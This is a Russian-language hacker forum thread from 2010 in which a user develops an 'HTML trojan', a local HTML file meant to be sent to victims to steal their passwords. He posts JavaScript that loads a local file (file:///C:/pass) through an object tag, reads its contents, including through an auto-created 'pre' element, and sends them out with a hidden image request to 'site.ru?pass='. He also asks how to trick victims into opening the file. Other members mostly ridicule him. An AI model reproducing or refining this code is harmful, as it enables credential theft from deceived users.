кража поролей ява скриптом
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
кража поролей ява скриптом - 2010-08-10 23:21:12.750000
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
Здравствуйте уважаемые хакеры у меня появилась идея своровать пороли с помощью хтмл файлика (тобиш юзер его загружает, открывает и пороли отправляются мне) я себе представляю это как то так:
в моем файле через тег object будет подгружаться файл с паролями и интерпритироватся как хтмл код а потом я буду обращаться к ниму ява скриптом и отправлять себе на сервер, но у меня есть некоторые сложности
1 куки хранятся по принципу имя учетки@имя куки не зная имя учетки я не смогу подгрузить нужный файл
2 как обратится из ява скрипта к содержимому подгруженного файла если в нем отсутствуют элементы хтмл разметки те document.getElementById('obj').contentWindow.document а далше то что?
3 как эту хрень можно впарить?
|
|
|
|
|
RE: кража поролей ява скриптом - 2010-09-01 16:39:53.036666
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
Млин не ужели ни кто за месяц не смог ответить?
и так попробую немного уточнить:
1 имена учеток скорее можно найти в файлах винды или в логах программ вопрос тока где конкретнее…
2 моих познаний в программировании не достаточно, но если это нельзя сделать с помощью ява скриптов то возможно это удастся сделать с помощью других скриптов исполняемых на стороне клиента…
3 думаю здесь полно вариантов, хотя заставить взрослого серьезного дядю, надо подумать….
|
|
|
|
|
RE: кража поролей ява скриптом - 2010-09-01 16:46:28.496666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Вы дурак - срипт не имеет доступа к локальным файлам, это очевидно. Было бы у вас желание узнать - вы бы не мучали никого идиотскими вопросами.
|
|
|
|
|
RE: кража поролей ява-мотоциклом - 2010-09-01 16:58:50.363333
|
|
|
Mатцал Коушек
Сообщений: 10407
Оценки: 91
Присоединился: 2008-07-09 10:27:49.520000
|
quote:
ORIGINAL: Pupkin-Zade
не мучали никого идиотскими вопросами.
Я, лично, ими не мучаюсь. Я ими наслаждаюсь.
Это прост кайф, какую галиматью пишут и как уверены, что она сработает.
<<- document.getElementById('obj').contentWindow.document а далше то что? 3 как эту хрень можно впарить? ->>
Выдумать такую хрень, внушить себе, что эту хрень можно впарить, сюда об этом топик впарить, и месяц(!) ожидать, что ему сюда ответ впарят.
|
|
|
|
|
RE: кража поролей ява скриптом - 2010-09-01 17:29:51.206666
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
quote:
Вы дурак - срипт не имеет доступа к локальным файлам
я еще раз повторюсь что пользователь сначала загрузит файл, а потом откроет
quote:
document.getElementById('obj').contentWindow.document
это всего лишь кусок кода впарывать мне надо хтмл файл
quote:
месяц(!)
меня просто не было
|
|
|
|
|
RE: кража поролей ява скриптом - 2010-09-01 23:00:25.433333
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
и так дабы прервать наслаждение некоторых и показать им на рабочем примере что я имел ввиду( и за одно что не все школьники придурки ) покажу на примере:
создаем файл pass на диске С и в нем пишим:
<div>супер пупер пароль</div>
далее создаем файл с произвольным названием и место положением и пишим в него:
<html>
<body>
<object data="file:///C:/pass" type="text/html" id="obj"></object>
<script type="text/javascript">
pass=document.getElementById('obj').contentWindow.document.getElementsByTagName('div')['0'].innerHTML
document.getElementById('obj').style.display="none"
alert(pass)
</script>
</body>
</html>
открываем его и вуаля информация из файла на вашем компьютере записана в переменную pass( для тех кто не понял ее можно отправлять на сервер как то так на пример:
document.write('<img src="site.ru?pass='+pass+'" style="display: none" />') )
но вся проблема в том что в моем примере у нас в файле имеются элемент разметки( блок div ) - обект к которому мы обращаемся из нашего скрипта(document.getElementById('obj').contentWindow.document.getElementsByTagName('div')['0'])
а как получить информацию из файла где нет разметки те если бы в файле pass было бы просто написано супер пупер пароль?
а да еще забыл сказать доступ к локальным файлам получить можно, но для этого надо заставить юзера изменить файл с конфигурацией об этом написано тут - http://kb.mozillazine.org/Links_to_local_pages_don%27t_work
|
|
|
|
|
RE: кража поролей ява скриптом - 2010-09-02 17:38:37.753333
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
quote:
а да еще забыл сказать доступ к локальным файлам получить можно, но для этого надо заставить юзера изменить файл с конфигурацией об этом написано тут - http://kb.mozillazine.org/Links_to_local_pages_don%27t_work
извиняюсь тупанул в статье выше показано как выводить локальные файлы взаимодействие с ними не возможно так как для этого у них должен быть один и тот же протокол и домен, но это не имеет отношения к рассматриваемому мной примеру так как в моем случае HTML троян находится не на удаленном сервере, а на компьютере юзера
|
|
|
|
|
RE: кража поролей ява скриптом - 2010-09-03 18:38:51.810000
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
Матцал Коушек, смеется тот кто смеется последним)))
pass=document.getElementById('obj').contentWindow.document.getElementsByTagName('pre')['0'].innerHTML
не смотря на то что в документе нет тега pre браузер автоматически его создает, а значит у нас есть DOM объект к которому мы можем обратится
|
|
|
|
|
RE: кража поролей ява скриптом - 2010-09-03 23:17:50.556666
|
|
|
Як Истребитель
Сообщений: 410
Оценки: 0
Присоединился: 2010-01-27 19:48:58.473333
|
ТС придумал новый вид троя, топик срочно в приват!!1
Вообще, сначала надо удлиннить файл конфигурации, только потом изменять. А то разметка тормозить будет.
|
|
|
|
|
|
